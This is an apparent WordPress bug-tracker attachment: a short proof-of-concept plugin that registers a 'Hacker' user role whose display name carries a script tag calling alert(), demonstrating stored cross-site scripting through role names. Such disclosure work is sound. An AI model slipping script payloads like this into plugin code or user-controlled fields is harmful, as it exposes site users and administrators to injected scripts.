Context Navigation

Ticket #53973: evil-user-role.php

File evil-user-role.php, 305 bytes (added by anonymized_18808415, 4 years ago)
PoC Plugin

Line
1	<?php
2	/*
3	Plugin Name: Evil User Role
4	Plugin URI: https://visse.org/
5	Description: Adding evil user role > XSS Injection PoC
6	Author: Visse
7	Version: 1.5.5.3
8	Author URI: https://visse.org/
9	*/
10
11	add_role( 'Hacker', __( 'Hacker<script>alert(`Visse`);</script>' ), array( 'read' => true, 'edit_posts' => true ) );